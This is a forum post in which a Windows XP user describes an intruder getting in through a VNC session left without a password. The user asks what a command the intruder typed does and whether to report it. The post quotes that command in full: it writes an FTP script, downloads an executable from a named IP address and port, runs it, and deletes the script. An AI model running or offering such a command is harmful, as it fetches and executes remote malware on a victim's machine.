I am running on a PentiumM, 1.8G laptop, WinXP 5.1, SP2 with all updates. I have a router/firewall, and opened up the VNC ports for someone to view my computer. Unfortunately, I removed the password to make it easier for our customer. Within 10 minutes after our session and before I closed up the port, I see strange activity on my computer and realize someone else jumped on. They opened up the start>run and tried to execute the following line:
cmd.exe /c del i&echo open 24.144.37.239 17313 > i&echo user 1 1 >> i &echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit
Whois results in OrgName: Conway Corporation
Traceroute dhcp37-239.cable.conwaycorp.net.
I think I closed down the dos window and port in time, but am not sure.
The above line looks to be getting my pc to download a file from them and then execute it. I am guessing bad things would then happen.
So, can someone let me know the following:
1. What does this do?
2. Should I report this to anyone? Conway Corp?
To me, this is a big deal considering they detected my open port within 15 minutes so they are probing vnc ports and given what I could have lost depending on their next actions. I can get only so much satisfaction by pinging their computer...
And yes, I know the correct answer is to not open up VNC ever again without a password. Lesson learned! To be safe, I backed up my laptop and am now running through your spyware/virus programs to clean up anything.
Thanks for any assistance. I appreciate all of the help from this site and use it often.